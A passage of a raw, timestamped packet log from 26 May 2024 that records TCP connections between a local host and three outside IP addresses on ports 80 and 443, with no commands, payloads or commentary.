                                                                              May 26, 2024 10:22:32.334582090 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.334642887 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.336235046 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.336276054 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.336344957 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.338243961 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.338279963 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.338335991 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.340286970 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.340322971 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.340384960 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.341543913 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.341578960 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.341631889 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.343466997 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.344485044 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.344518900 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.344546080 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.346472979 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.346527100 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.346541882 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.348290920 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.348366022 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.350204945 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.350239992 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.350272894 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.350301027 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.350310087 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.350363016 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.351540089 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.352374077 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.352408886 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.352430105 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.355129957 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.355163097 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.355187893 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.394944906 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.395138979 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.399995089 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.418895006 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.419028044 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.419318914 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.420124054 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.420212030 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.420736074 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.421515942 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.421580076 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.422785997 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.422822952 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.422878027 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.424252033 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.424288988 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.424340010 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.425941944 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.425981045 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.426032066 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.426866055 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.426903963 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.426959991 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.428646088 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.428683043 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.428749084 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.430042028 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.430079937 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.430140018 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.431622028 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.431659937 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.431714058 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.432925940 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.432962894 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.432995081 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.433015108 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.434268951 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.434303999 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.434329987 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.435714006 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.435750008 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.435781002 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.437138081 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.437174082 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.437202930 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.438426971 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.438463926 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.438513041 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.438513041 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.438575029 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.439688921 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.439726114 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.439784050 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.440956116 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.440992117 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.441041946 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.442198992 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.442234993 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.442306995 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.443506002 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.443542004 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.443607092 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.444174051 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.444762945 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.444797039 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.444833040 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.445866108 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.445943117 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.446460962 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.446516037 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.446585894 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.447622061 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.447659016 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.447722912 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.448674917 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.448712111 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.448771954 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.449254036 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.449290037 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.449347973 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.450298071 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.450858116 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.450892925 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.450926065 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.451896906 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.451931953 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.451965094 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.452922106 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.452958107 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.452986956 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.452992916 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.453058004 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.453910112 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.453946114 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.454013109 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.454818964 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.454854012 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.454909086 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.455729008 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.455764055 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.455820084 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.456645966 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.456682920 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.456757069 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.457551956 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.457586050 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.457618952 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.457643032 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.458379030 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.458414078 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.458447933 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.459213018 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.459249020 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.459279060 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.460042953 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.460078955 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.460112095 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.460114956 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.460170984 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.481970072 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.482032061 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.482218027 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.486673117 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.486732960 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.486787081 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.505244017 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.505300045 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.505446911 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.505688906 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.506043911 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.506078959 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.506211042 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.506369114 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.506547928 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.506829023 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.506866932 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.506922960 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.507668972 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.508173943 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.508208990 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.508243084 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.508249044 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.508332014 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.511045933 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.511081934 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.511115074 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.511148930 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.511182070 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.511199951 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.511214972 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.511401892 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.535444021 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.535494089 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.535531044 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.535564899 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.535567045 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.535633087 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.536053896 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.536325932 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.536361933 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.536402941 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.536976099 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.537014008 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.537046909 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.537051916 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.537115097 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.537806988 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.537848949 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.537945986 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.538428068 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.538444996 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.538512945 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.539225101 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.539243937 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.539309025 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.539931059 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.539952040 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.540004015 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.540585041 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.540604115 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.540617943 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.540669918 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.541306019 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.541323900 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.541388035 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.542068958 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.542087078 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.542159081 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.543307066 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.543324947 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.543373108 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.543615103 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.543633938 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.543648958 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.543679953 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.543756008 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.544197083 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.544215918 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.544344902 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.544903994 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.544922113 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.544981003 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.546227932 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.546247005 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.546365976 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.546384096 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.546394110 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.546461105 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.550357103 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.550379038 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.550393105 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.550409079 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.550424099 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.550441980 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.550457954 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.550466061 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.550677061 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.550914049 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.550932884 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.551002026 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.551670074 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.551748991 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.551932096 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.552187920 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.552203894 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.552304029 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.552937031 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.552956104 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.553015947 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.553631067 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.553711891 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.554023981 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.554043055 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.554109097 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.554843903 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.554863930 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.554877996 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.554928064 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.556617975 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.556636095 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.556667089 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.556672096 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.556684971 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.556711912 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.557116032 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.557132959 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.557171106 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.558006048 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.558026075 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.558041096 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.558060884 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.558090925 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.558373928 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.558392048 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.558448076 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.559233904 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.559253931 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.559302092 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.559845924 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.559865952 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.559911013 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.560550928 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.560570002 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.560611963 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.561274052 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.561292887 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.561306953 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.561338902 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.562819958 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.562838078 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.562853098 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.562886953 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.562916994 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.563642979 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.563796997 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.563847065 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.564233065 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.589404106 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.589432001 CEST804974245.129.96.86192.168.2.4
                                                                              May 26, 2024 10:22:32.589612007 CEST4974280192.168.2.445.129.96.86
                                                                              May 26, 2024 10:22:32.687905073 CEST4974380192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:32.693792105 CEST8049743190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:32.694238901 CEST4974380192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:32.694240093 CEST4974380192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:32.694240093 CEST4974380192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:32.744831085 CEST8049743190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:32.791687012 CEST8049743190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:33.661588907 CEST8049743190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:33.666440964 CEST8049743190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:33.669761896 CEST4974380192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:33.700459003 CEST4974380192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:33.720499039 CEST8049743190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:33.782723904 CEST4974480192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:33.788235903 CEST8049744190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:33.788475990 CEST4974480192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:33.788541079 CEST4974480192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:33.788656950 CEST4974480192.168.2.4190.28.110.209
                                                                              May 26, 2024 10:22:33.844628096 CEST8049744190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:33.891644955 CEST8049744190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:33.981163025 CEST49745443192.168.2.4188.114.96.3
                                                                              May 26, 2024 10:22:33.981246948 CEST44349745188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:33.981659889 CEST49745443192.168.2.4188.114.96.3
                                                                              May 26, 2024 10:22:33.985878944 CEST49745443192.168.2.4188.114.96.3
                                                                              May 26, 2024 10:22:33.985955000 CEST44349745188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:34.503437042 CEST44349745188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:34.503535986 CEST49745443192.168.2.4188.114.96.3
                                                                              May 26, 2024 10:22:34.512286901 CEST49745443192.168.2.4188.114.96.3
                                                                              May 26, 2024 10:22:34.512315989 CEST44349745188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:34.512589931 CEST44349745188.114.96.3192.168.2.4
                                                                              May 26, 2024 10:22:34.562129021 CEST49745443192.168.2.4188.114.96.3
                                                                              May 26, 2024 10:22:34.788914919 CEST8049744190.28.110.209192.168.2.4
                                                                              May 26, 2024 10:22:34.794049978 CEST8049744190.28.110.209192.168.2.4
